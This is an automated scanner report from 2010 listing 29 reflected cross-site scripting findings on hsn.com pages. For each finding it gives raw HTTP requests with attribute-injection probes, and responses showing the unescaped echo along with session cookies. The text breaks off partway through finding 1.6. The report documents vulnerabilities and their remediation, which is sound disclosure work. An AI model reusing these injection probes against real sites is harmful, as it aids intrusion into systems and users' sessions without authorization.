hsn.com | CWE-79 | XSS | Vulnerability Crawler

Cross Site Scripting, XSS, Vulnerability Crawler

Report generated by XSS.CX at Fri Dec 10 14:08:07 CST 2010.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://beauty.hsn.com/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx [name of an arbitrarily supplied request parameter]

1.2. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [name of an arbitrarily supplied request parameter]

1.3. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [o parameter]

1.4. http://beauty.hsn.com/my-life-mary-j-blige-body-cream_p-6231368_xp.aspx [name of an arbitrarily supplied request parameter]

1.5. http://beauty.hsn.com/my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx [name of an arbitrarily supplied request parameter]

1.6. http://beauty.hsn.com/my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx [name of an arbitrarily supplied request parameter]

1.7. http://beauty.hsn.com/signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx [name of an arbitrarily supplied request parameter]

1.8. http://beauty.hsn.com/wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx [name of an arbitrarily supplied request parameter]

1.9. http://beauty.hsn.com/wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx [name of an arbitrarily supplied request parameter]

1.10. http://beauty.hsn.com/wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx [name of an arbitrarily supplied request parameter]

1.11. http://beauty.hsn.com/wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx [name of an arbitrarily supplied request parameter]

1.12. http://beauty.hsn.com/wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx [name of an arbitrarily supplied request parameter]

1.13. http://beauty.hsn.com/wei-east-wrinkle-relief-system_p-6119231_xp.aspx [name of an arbitrarily supplied request parameter]

1.14. http://cnt.hsn.com/alerts/Js [abtestid parameter]

1.15. http://cnt.hsn.com/alerts/Js [abtestval parameter]

1.16. https://cnt.hsn.com/alerts/Js [abtestid parameter]

1.17. https://cnt.hsn.com/alerts/Js [abtestval parameter]

1.18. http://jewelry.hsn.com/colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx [name of an arbitrarily supplied request parameter]

1.19. http://kitchen-dining.hsn.com/main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx [name of an arbitrarily supplied request parameter]

1.20. http://kitchen-dining.hsn.com/waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx [name of an arbitrarily supplied request parameter]

1.21. http://sports.hsn.com/steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx [name of an arbitrarily supplied request parameter]

1.22. http://sports.hsn.com/steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx [name of an arbitrarily supplied request parameter]

1.23. http://sports.hsn.com/steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx [name of an arbitrarily supplied request parameter]

1.24. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [name of an arbitrarily supplied request parameter]

1.25. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [nolnav parameter]

1.26. http://www.hsn.com/cs/default.aspx [cm_mmc parameter]

1.27. http://www.hsn.com/cs/default.aspx [cm_sp parameter]

1.28. http://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]

1.29. https://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 29 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://beauty.hsn.com/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c820"%20a%3db%20a4f378ebf79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c820" a=b a4f378ebf79 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx?3c820"%20a%3db%20a4f378ebf79=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:35:37 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2ffftf0aOx4sLxWYuMxot84&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fconair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx%3f3c820%22%2520a%253db%2520a4f378ebf79%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=S6o7HXFveYaKmnx65JPilg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:37 GMT; path=/
Set-Cookie: sessionid=id=xk2CTuXP9RMaBVdLxv6VRZMEGDd44ygsAREXECz77WChhIEH2grNqg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=aG4tGzcy9zVLmlaZDBmcarMZdfAOSBntVhlhPhqZmNlJxdBuP9nUlQ%3d%3d&abtid=s4CLvKGvFZdIIW7shqbCBU0DxYZxCEihMNqdtVOxs977QKYSEZi9UA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:37 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:35:37 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=9O%2bVFKokcv%2bx64lwXWHyaGzbwR2OHmNWfgYGUbtTciQ%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=60255B114274563A49F723844DFFF2E5; domain=.hsn.com; path=/
Set-Cookie: TLTHID=60255B114274563A49F723844DFFF2E5; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:35:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 103806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx?3c820" a=b a4f378ebf79=1&cm_mmc=sharingsite*email*PD*1062769"
shareTitle="Conair 400-Watt Soft Bonnet Hair Dryer at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-p
...[SNIP]...

1.2. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /korres-guava-luxury-body-set_p-6207210_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeb10"%20a%3db%206d75f597e16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aeb10" a=b 6d75f597e16 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /korres-guava-luxury-body-set_p-6207210_xp.aspx?aeb10"%20a%3db%206d75f597e16=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:56 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2b8FzYqZ8ETdnLpI4X2eOMT&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fkorres-guava-luxury-body-set_p-6207210_xp.aspx%3faeb10%22%2520a%253db%25206d75f597e16%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=Ej5QjQHtgR7G9u5pIYJeBw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:57 GMT; path=/
Set-Cookie: sessionid=id=zYmxGS%2bw9IUw23SjxxEF2s%2bVBmMqOZ0FNHDTmFPw%2brVX4H9sGDmddQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=jO%2bSd2EhE86zAEpj9LsgusPmwtBRVKawHj5sZY6WjVy6WqZqrH5Gdw%3d%3d&abtid=grSCswcjBpQukhVVZyArkt4Ns7PLc2BUsnLRsYKGmpca%2fA9sGAsy4A%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:57 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=%2bITHbgmE1bNmUfew9UZa%2fvwyrL7jGLLoeQbkJHhGHFk%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=42802E7D4064DCC37825F0A016CA167E; domain=.hsn.com; path=/
Set-Cookie: TLTHID=42802E7D4064DCC37825F0A016CA167E; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx?aeb10" a=b 6d75f597e16=1&cm_mmc=sharingsite*email*PD*102036"
shareTitle="Korres Guava Luxury Body Set at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-position: 0
...[SNIP]...

1.3. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /korres-guava-luxury-body-set_p-6207210_xp.aspx

Issue detail

The value of the o request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46231"%20a%3db%20029f826e562 was submitted in the o parameter. This input was echoed as 46231" a=b 029f826e562 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /korres-guava-luxury-body-set_p-6207210_xp.aspx?o=OTCM46231"%20a%3db%20029f826e562&ocm=OTCM HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2b8FzYqZ8ETdnLpI4X2eOMT&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:35:10 GMT; path=/
Set-Cookie: sitesession=o=OTCM46231%22+a%3db+029f826e562&pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fkorres-guava-luxury-body-set_p-6207210_xp.aspx%3fo%3dOTCM46231%22%2520a%253db%2520029f826e562%26ocm%3dOTCM; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=Ej5QjQHtgR7G9u5pIYJeBw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:10 GMT; path=/
Set-Cookie: sessionid=id=YpnHCILR%2ffwW0wS5g8ZB%2bNS1HgK9cYW8k%2fCJmbPW5TZX8LRb6Ap5Hw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=74n41%2f6gUM2bcfaF4ip%2fo%2fyEpZw6o2%2bYqoyHd9BR8GRWLOgwh5TXsw%3d%3d&abtid=uthHw8qGSi76a6KlK0%2bfGOJg0JKhBarFUHCXCZjTw2AhqE9iRY3icQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:10 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:35:10 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=o5a9PTf4tYgPUwTWtKIylUr2Y4owjbvk47fXG%2bKmrhI%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=27F9AC054DD7FA8B54FA598B00DE8D20; domain=.hsn.com; path=/
Set-Cookie: TLTHID=27F9AC054DD7FA8B54FA598B00DE8D20; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:35:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx?o=OTCM46231" a=b 029f826e562&ocm=OTCM&cm_mmc=sharingsite*email*PD*102036"
shareTitle="Korres Guava Luxury Body Set at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-posit
...[SNIP]...

1.4. http://beauty.hsn.com/my-life-mary-j-blige-body-cream_p-6231368_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /my-life-mary-j-blige-body-cream_p-6231368_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37174"%20a%3db%20201c33035a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37174" a=b 201c33035a0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /my-life-mary-j-blige-body-cream_p-6231368_xp.aspx?37174"%20a%3db%20201c33035a0=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:35 GMT; path=/
Set-Cookie: customer=ksUrl=MN4mbmq89OqyBYkGnxtEdYQ82x2i1%2bSo&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fmy-life-mary-j-blige-body-cream_p-6231368_xp.aspx%3f37174%22%2520a%253db%2520201c33035a0%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=CNJteWmoJh0Fs3%2b%2bGDwgtg%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:36 GMT; path=/
Set-Cookie: sessionid=id=fmEsLndDwqqRPMAitEkSHsAdnXP3gJfxde9D0bXk0jjjb98DKvx7Dw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=v8crZSNTdbq76rc8MQ3zOJj66rRMDABymlNA4AIsabrvwg6zHgVhyA%3d%3d&abtid=414XoXx7ynqJIWEsNNL9b4%2fF12efuWHg%2fdVZCaOrg4dWb1DmJAmqXw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:35 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:36 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=AuSEX%2fGyjDqtE0YqAYbaHYy4iqXOeqwntGjs0iY6IF8%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=F3B427854CBEAA1B8DC75CB7464BC570; domain=.hsn.com; path=/
Set-Cookie: TLTHID=F3B427854CBEAA1B8DC75CB7464BC570; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 120357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/my-life-mary-j-blige-body-cream_p-6231368_xp.aspx?37174" a=b 201c33035a0=1&cm_mmc=sharingsite*email*PD*104627"
shareTitle="My Life&#174; Mary J. Blige Body Cream - AutoShip at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="ba
...[SNIP]...

1.5. http://beauty.hsn.com/my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846b9"%20a%3db%2068a419e1b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 846b9" a=b 68a419e1b84 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx?846b9"%20a%3db%2068a419e1b84=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:40 GMT; path=/
Set-Cookie: customer=ksUrl=MN4mbmq89OqyBYkGnxtEdXZc3mE8xUW4&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fmy-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx%3f846b9%22%2520a%253db%252068a419e1b84%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=q801YuowZ%2bjhiTKP7X%2byzg%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:41 GMT; path=/
Set-Cookie: sessionid=id=PVsTDBL4M6VsT5TkEgaVjx1T%2b6cFDZdqFQJScA29k476s5oFzVsCHA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=od6NPBkg9eYa94p41V%2ftAJa1%2fWN%2fuoY%2fAjCMUoYTQ49XJyLoGyFIeQ%3d%3d&abtid=rcqsP4B%2f5lxU4k2YSnrVOqkNHn0YLVxqifWo1bh1Bj%2bBO2%2fgqjsylQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:40 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:41 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=z0RsEvH%2fkMM2grqqLWT0faWzkFoWfzMFkz%2feC%2bsfVNw%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=06CE239045B453A924D30188EC479E4D; domain=.hsn.com; path=/
Set-Cookie: TLTHID=06CE239045B453A924D30188EC479E4D; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 132550


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
p://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx?846b9" a=b 68a419e1b84=1&cm_mmc=sharingsite*email*PD*958202"
shareTitle="My Life&#174; Mary J. Blige Eau de Parfum and Clutch Set - AutoShip at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.6. http://beauty.hsn.com/my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf37a"%20a%3db%20d1e776cafa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf37a" a=b d1e776cafa1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx?bf37a"%20a%3db%20d1e776cafa1=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:34 GMT; path=/
Set-Cookie: customer=ksUrl=MN4mbmq89OqyBYkGnxtEdQn8exkmbtGl&Look_Up_=CE_1; domain=.hsn.com; path=/
